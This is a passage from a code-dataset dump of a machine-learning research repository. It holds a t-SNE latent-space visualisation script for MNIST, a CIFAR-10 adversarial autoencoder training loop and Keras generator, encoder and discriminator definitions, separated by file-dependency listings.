plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,517 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/tsne_test.py | import os
import sys
import h5py
# import cv2
import math
import random, string
from matplotlib.pyplot import cm
import numpy as np
from scipy.stats import norm
from sklearn import manifold
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.ticker import NullFormatter
from mpl_toolkits.mplot3d import Axes3D
from mnist_conv_ae_models import encoder_model
def loadDataset():
    """Load MNIST, reshape to NHWC (28x28x1) and scale pixels into [0, 1]."""
    from keras.datasets import mnist
    (train_x, train_y), (test_x, test_y) = mnist.load_data()
    # Add the trailing channel axis and normalize from [0, 255] to [0, 1]
    train_x = train_x.reshape([-1, 28, 28, 1]) / 255.
    test_x = test_x.reshape([-1, 28, 28, 1]) / 255.
    return (train_x, train_y), (test_x, test_y)
def plotEmbeddings3D(embeddings, y_sample, labels, num_classes):
    """Scatter-plot 3D embeddings, one color and legend entry per class.

    Args:
        embeddings: array of shape (num_samples, 3) with the 3D coordinates.
        y_sample: integer class label per sample.
        labels: sequence of legend labels, one per class.
        num_classes: number of distinct classes to plot.
    """
    print('Plotting in 3D...')
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    palette = cm.Spectral(np.linspace(0, 1, num_classes))
    xs = embeddings[:, 0]
    ys = embeddings[:, 1]
    zs = embeddings[:, 2]
    # One scatter call per class so each class gets its own legend entry
    for cls in range(num_classes):
        mask = y_sample == cls
        ax.scatter(xs[mask], ys[mask], zs[mask], color=palette[cls], label=labels[cls], s=10)
    # Hide tick labels on all three axes
    ax.xaxis.set_major_formatter(NullFormatter())
    ax.yaxis.set_major_formatter(NullFormatter())
    ax.zaxis.set_major_formatter(NullFormatter())
    plt.axis('tight')
    plt.legend(loc='best', scatterpoints=1, fontsize=5)
    plt.show()
def plotEmbeddings2D(embeddings, y_sample, labels, num_classes, with_images=False, images=None):
    """Scatter-plot 2D embeddings, colored by class label.

    Args:
        embeddings: array of shape (num_samples, 2) with the 2D coordinates.
        y_sample: integer class label per sample.
        labels: sequence of legend labels, one per class.
        num_classes: number of distinct classes to plot.
        with_images: if True, overlay the source images at their embedding
            coordinates.
        images: images to overlay when ``with_images`` is True. Defaults to
            the module-level ``X_sample`` for backward compatibility with the
            original implicit-global behavior.
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    colors = cm.Spectral(np.linspace(0, 1, num_classes))
    xx = embeddings[:, 0]
    yy = embeddings[:, 1]
    # Optionally overlay the raw images at their embedding locations
    if with_images:
        # Fix: the original read the global X_sample; prefer an explicit arg
        imgs = images if images is not None else X_sample
        for i, (x, y) in enumerate(zip(xx, yy)):
            im = OffsetImage(imgs[i], zoom=0.1, cmap='gray')
            ab = AnnotationBbox(im, (x, y), xycoords='data', frameon=False)
            ax.add_artist(ab)
        ax.update_datalim(np.column_stack([xx, yy]))
        ax.autoscale()
    # Plot the 2D points, one scatter per class so the legend is labelled
    for i in range(num_classes):
        ax.scatter(xx[y_sample == i], yy[y_sample == i], color=colors[i], label=labels[i], s=10)
    ax.xaxis.set_major_formatter(NullFormatter())
    ax.yaxis.set_major_formatter(NullFormatter())
    plt.axis('tight')
    plt.legend(loc='best', scatterpoints=1, fontsize=5)
    plt.show()
# Show dataset images with T-sne projection of latent space encoding
def computeLatentSpaceEmbeddings(X, encoder, num_dimensions):
    """Encode X with `encoder`, then t-SNE the codes down to `num_dimensions`.

    Returns an array of shape (num_samples, num_dimensions).
    """
    # Map images into the learned latent space
    print("Computing latent space projection...")
    codes = encoder.predict(X)
    # Project the latent codes with t-SNE (PCA initialization)
    print("Computing t-SNE embedding...")
    projector = manifold.TSNE(n_components=num_dimensions, init='pca')  # , random_state=0)
    return projector.fit_transform(codes)
# Show dataset images with T-sne projection of pixel space
def computePixelSpaceEmbeddings(X, num_dimensions):
    """Compute a t-SNE embedding of images directly in pixel space.

    Args:
        X: image array of shape (num_samples, ...); trailing dims are flattened.
        num_dimensions: dimensionality of the t-SNE output (2 or 3).

    Returns:
        Array of shape (num_samples, num_dimensions) with the embeddings.
    """
    print("Computing t-SNE embedding...")
    tsne = manifold.TSNE(n_components=num_dimensions, init='pca')  # , random_state=0)
    # Fix: flatten per-sample from X's own shape instead of relying on the
    # module-level `imageSize` global and a hard-coded single channel.
    embeddings = tsne.fit_transform(X.reshape(X.shape[0], -1))
    return embeddings
## Run visualizations
imageSize = 28
latent_dim = 32
num_dimensions = 3
num_classes = 10
num_samples = 10000
labels = np.arange(num_classes)
# Load dataset to test
print("Loading dataset...")
(X_train, y_train), (X_test, y_test) = loadDataset()
X_sample = X_test[:num_samples]
y_sample = y_test[:num_samples]
print(X_test.shape)
print(X_sample.shape)
encoder = encoder_model()
encoder.load_weights('mnist_conv_ae_encoder.h5')
latent_embeddings = computeLatentSpaceEmbeddings(X_sample, encoder, num_dimensions)
pixel_embeddings = computePixelSpaceEmbeddings(X_sample, num_dimensions)
#plotEmbeddings3D(latent_embeddings, y_sample, labels, num_classes)
#plotEmbeddings3D(pixel_embeddings, y_sample, labels, num_classes)
plotEmbeddings2D(latent_embeddings, y_sample, labels, num_classes)
plotEmbeddings2D(pixel_embeddings, y_sample, labels, num_classes)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,518 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_aae_train.py | from __future__ import print_function, division
from cifar10_models import deterministic_encoder_model, generator_model, aae_discriminator_model
from common_models.common_models import aae_model
from functions.visualization_funcs import save_reconstructions, plot_gan_batch_loss, plot_gan_epoch_loss, \
plot_discriminator_acc, save_imgs
from functions.data_funcs import get_cifar10
from functions.auxiliary_funcs import save_models
from keras.optimizers import Adam
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_aae'
model_path = 'Models/cifar10_aae'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate and compile models
# =====================================
encoder = deterministic_encoder_model()
generator = generator_model()
discriminator = aae_discriminator_model()
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile discriminator
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
# Compile AAE
discriminator.trainable = False
aae = aae_model(encoder, generator, discriminator, img_shape)
aae.compile(loss=['binary_crossentropy', 'binary_crossentropy'],
loss_weights=[0.99, 0.01],
optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
epoch_save_interval = 5
# Compute number of batches in one epoch
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
latent_fake = encoder.predict(imgs)
latent_real = np.random.normal(size=(batch_size, latent_dim))
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
d_loss_real = discriminator.train_on_batch(latent_real, valid)
d_loss_fake = discriminator.train_on_batch(latent_fake, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ---------------------
# Train Generator
# ---------------------
# Train the generator
g_loss = aae.train_on_batch(imgs, [imgs, valid])
# Record generator loss
g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss[0]
g_epoch_loss_sum += g_loss[0]
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch + 1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss[0]))
# Get epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
# Generate random sample of latent vectors and save generated images
z = np.random.normal(size=(25, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=True)
# (No 2D latent-space visualization here: latent_dim is 64)
# Save encoder weights
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Save loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,519 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_models.py | import keras.backend as K
from keras.models import Model, Sequential
from keras.layers import Input
from keras.layers.core import Flatten, Dropout, Lambda, Activation, Reshape
from keras.layers.merge import Concatenate
from keras.layers.convolutional import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.engine.topology import Layer
img_rows = 32
img_cols = 32
mask_rows = 10
mask_cols = 10
channels = 3
img_shape = (img_rows, img_cols, channels)
mask_shape = (mask_rows, mask_cols, channels)
latent_dim = 64
class ConvMaxout(Layer):
    """Maxout activation over channel groups of a conv feature map.

    Splits the channel axis into groups of `n_piece` consecutive channels
    and keeps the per-group maximum, so the output has ch // n_piece
    channels and unchanged spatial dimensions.
    """

    def __init__(self, n_piece, **kwargs):
        # Number of channels folded into each maxout unit.
        self.n_piece = n_piece
        super(ConvMaxout, self).__init__(**kwargs)

    def call(self, x):
        # Dynamic (batch, height, width, channels) of the input tensor.
        n = K.shape(x)[0]
        h = K.shape(x)[1]
        w = K.shape(x)[2]
        ch = K.shape(x)[3]
        # Group channels in runs of n_piece, then max within each group.
        x = K.reshape(x, (n, h, w, ch//self.n_piece, self.n_piece))
        x = K.max(x, axis=-1)
        return x

    def compute_output_shape(self, input_shape):
        # Only the channel axis shrinks; spatial dims are unchanged.
        n, h, w, ch = input_shape
        return (n, h, w, ch//self.n_piece)
def generator_model():
    """Generator: latent vector (latent_dim,) -> 32x32x3 image in [0, 1].

    Treats the latent code as a 1x1 "pixel" and upsamples it through a
    stack of transposed convolutions (BatchNorm + LeakyReLU between each);
    the final sigmoid keeps pixel values in [0, 1].
    """
    model = Sequential()
    model.add(Reshape((1, 1, latent_dim), input_shape=(latent_dim,)))
    model.add(Conv2DTranspose(256, (4, 4), strides=(1, 1)))
    model.add(BatchNormalization())
    model.add(LeakyReLU(0.1))
    model.add(Conv2DTranspose(128, (4, 4), strides=(2, 2)))
    model.add(BatchNormalization())
    model.add(LeakyReLU(0.1))
    model.add(Conv2DTranspose(64, (4, 4), strides=(1, 1)))
    model.add(BatchNormalization())
    model.add(LeakyReLU(0.1))
    model.add(Conv2DTranspose(32, (4, 4), strides=(2, 2)))
    model.add(BatchNormalization())
    model.add(LeakyReLU(0.1))
    model.add(Conv2DTranspose(32, (5, 5), strides=(1, 1)))
    model.add(BatchNormalization())
    model.add(LeakyReLU(0.1))
    model.add(Conv2D(32, (1, 1), strides=(1, 1)))
    model.add(BatchNormalization())
    model.add(LeakyReLU(0.1))
    model.add(Conv2D(3, (1, 1), strides=(1, 1)))
    model.add(Activation('sigmoid'))
    # FIX: removed the leftover debug print of model.output_shape.
    return model
def ce_generator_model():
    """Context-encoder generator: latent vector -> mask-sized image patch."""
    stages = [
        Reshape((1, 1, latent_dim), input_shape=(latent_dim,)),
        Conv2DTranspose(256, (4, 4), strides=(1, 1)),
        BatchNormalization(),
        LeakyReLU(0.1),
        Conv2DTranspose(128, (4, 4), strides=(2, 2)),
        BatchNormalization(),
        LeakyReLU(0.1),
        Conv2D(3, (1, 1), strides=(1, 1)),
        Activation('sigmoid'),
    ]
    model = Sequential()
    for stage in stages:
        model.add(stage)
    return model
def encoder_model():
    """Stochastic BiGAN encoder: 32x32x3 image -> sampled 64-d latent code."""
    # NOTE(review): `input` shadows the builtin; kept for byte-compatibility.
    input = Input(shape=img_shape)
    # Conv stack reducing the image to a 1x1 spatial feature map.
    x = Conv2D(32, (5,5), strides=(1,1))(input)
    x = BatchNormalization()(x)
    x = LeakyReLU(0.1)(x)
    x = Conv2D(64, (4,4), strides=(2,2))(x)
    x = BatchNormalization()(x)
    x = LeakyReLU(0.1)(x)
    x = Conv2D(128, (4,4), strides=(1,1))(x)
    x = BatchNormalization()(x)
    x = LeakyReLU(0.1)(x)
    x = Conv2D(256, (4,4), strides=(2,2))(x)
    x = BatchNormalization()(x)
    x = LeakyReLU(0.1)(x)
    x = Conv2D(512, (4,4), strides=(1,1))(x)
    x = BatchNormalization()(x)
    x = LeakyReLU(0.1)(x)
    x = Conv2D(512, (1,1), strides=(1,1))(x)
    x = BatchNormalization()(x)
    x = LeakyReLU(0.1)(x)
    # Two 1x1-conv heads: mean and (presumably) log-std of the latent
    # distribution — TODO confirm against the training scripts.
    mu = Conv2D(64, (1,1), strides=(1,1))(x)
    sigma = Conv2D(64, (1,1), strides=(1,1))(x)
    concatenated = Concatenate(axis=-1)([mu, sigma])
    # Reparameterization trick: z = mu + exp(sigma) * eps, eps ~ N(0, I).
    # The first 64 channels of the concat are mu, the last 64 are sigma.
    z = Lambda(
        function=lambda x: x[:,:,:,:64] + K.exp(x[:,:,:,64:]) * K.random_normal(shape=K.shape(x[:,:,:,64:])),
        output_shape=(1,1,64))(concatenated)
    output = Flatten()(z)
    return Model(input, output)
def vae_encoder_model():
    """VAE encoder: image -> [z_mean, z_log_var], each flattened to 64-d."""
    image_in = Input(shape=img_shape)
    features = image_in
    # Conv trunk: each step is Conv2D -> BatchNorm -> LeakyReLU(0.1).
    trunk = [
        (32, (5, 5), (1, 1)),
        (64, (4, 4), (2, 2)),
        (128, (4, 4), (1, 1)),
        (256, (4, 4), (2, 2)),
        (512, (4, 4), (1, 1)),
        (512, (1, 1), (1, 1)),
    ]
    for n_filters, kernel, stride in trunk:
        features = Conv2D(n_filters, kernel, strides=stride)(features)
        features = BatchNormalization()(features)
        features = LeakyReLU(0.1)(features)
    # Separate 1x1-conv heads for the posterior mean and log-variance.
    mean_head = Conv2D(64, (1, 1), strides=(1, 1))(features)
    log_var_head = Conv2D(64, (1, 1), strides=(1, 1))(features)
    return Model(image_in, [Flatten()(mean_head), Flatten()(log_var_head)])
def deterministic_encoder_model():
    """Deterministic encoder: image -> 64-d latent code (no sampling)."""
    image_in = Input(shape=img_shape)
    features = image_in
    # Conv trunk: each step is Conv2D -> BatchNorm -> LeakyReLU(0.1).
    trunk = [
        (32, (5, 5), (1, 1)),
        (64, (4, 4), (2, 2)),
        (128, (4, 4), (1, 1)),
        (256, (4, 4), (2, 2)),
        (512, (4, 4), (1, 1)),
        (512, (1, 1), (1, 1)),
    ]
    for n_filters, kernel, stride in trunk:
        features = Conv2D(n_filters, kernel, strides=stride)(features)
        features = BatchNormalization()(features)
        features = LeakyReLU(0.1)(features)
    # Single 1x1-conv projection straight to the latent code.
    code = Conv2D(64, (1, 1), strides=(1, 1))(features)
    return Model(image_in, Flatten()(code))
def bigan_discriminator_model():
    """BiGAN discriminator over (latent code, image) pairs -> probability.

    Three sub-networks: a 1x1-conv stack on the code, a conv stack on the
    image, and a joint 1x1-conv head on their channel-wise concatenation.
    Both branches end as 1x1 spatial maps, so Concatenate(axis=-1) is valid.
    Dropout + ConvMaxout are used throughout instead of plain activations.
    """
    z_in = Input(shape=(latent_dim,))
    x_in = Input(shape=img_shape)
    # Latent branch: treat the code as a 1x1 "image".
    z = Reshape((1, 1, latent_dim))(z_in)
    z = Dropout(0.2)(z)
    z = Conv2D(512, (1,1), strides=(1,1))(z)
    z = ConvMaxout(n_piece=2)(z)
    z = Dropout(0.5)(z)
    z = Conv2D(512, (1,1), strides=(1,1))(z)
    z = ConvMaxout(n_piece=2)(z)
    # Image branch: downsample to a 1x1 map.
    x = Dropout(0.2)(x_in)
    x = Conv2D(32, (5,5), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(64, (4,4), strides=(2,2))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(128, (4,4), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(256, (4,4), strides=(2,2))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(512, (4,4), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    # Joint head over the concatenated branch features.
    concatenated = Concatenate(axis=-1)([z, x])
    c = Dropout(0.5)(concatenated)
    c = Conv2D(1024, (1,1), strides=(1,1))(c)
    c = ConvMaxout(n_piece=2)(c)
    c = Dropout(0.5)(c)
    c = Conv2D(1024, (1,1), strides=(1,1))(c)
    c = ConvMaxout(n_piece=2)(c)
    c = Dropout(0.5)(c)
    c = Conv2D(1, (1,1), strides=(1,1), activation='sigmoid')(c)
    validity = Flatten()(c)
    return Model([z_in, x_in], validity)
def gan_discriminator_model():
    """GAN discriminator: 32x32x3 image -> real/fake probability.

    Dropout precedes every convolution (0.2 on the input, 0.5 after) and
    ConvMaxout replaces plain activations throughout.
    """
    image_in = Input(shape=img_shape)
    h = image_in
    # (filters, kernel, stride, dropout rate applied just before the conv).
    body = [
        (32, (5, 5), (1, 1), 0.2),
        (64, (4, 4), (2, 2), 0.5),
        (128, (4, 4), (1, 1), 0.5),
        (256, (4, 4), (2, 2), 0.5),
        (512, (4, 4), (1, 1), 0.5),
    ]
    for n_filters, kernel, stride, rate in body:
        h = Dropout(rate)(h)
        h = Conv2D(n_filters, kernel, strides=stride)(h)
        h = ConvMaxout(n_piece=2)(h)
    # 1x1-conv classification head.
    for _ in range(2):
        h = Dropout(0.5)(h)
        h = Conv2D(1024, (1, 1), strides=(1, 1))(h)
        h = ConvMaxout(n_piece=2)(h)
    h = Dropout(0.5)(h)
    h = Conv2D(1, (1, 1), strides=(1, 1), activation='sigmoid')(h)
    return Model(image_in, Flatten()(h))
def ce_discriminator_model():
    """Context-encoder discriminator: 10x10x3 mask patch -> probability.

    Same Dropout + Conv2D + ConvMaxout pattern as the image discriminator,
    with smaller kernels because the input patch is only 10x10.
    """
    x_in = Input(shape=mask_shape)
    x = Dropout(0.2)(x_in)
    x = Conv2D(32, (4,4), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(64, (3,3), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(128, (3,3), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
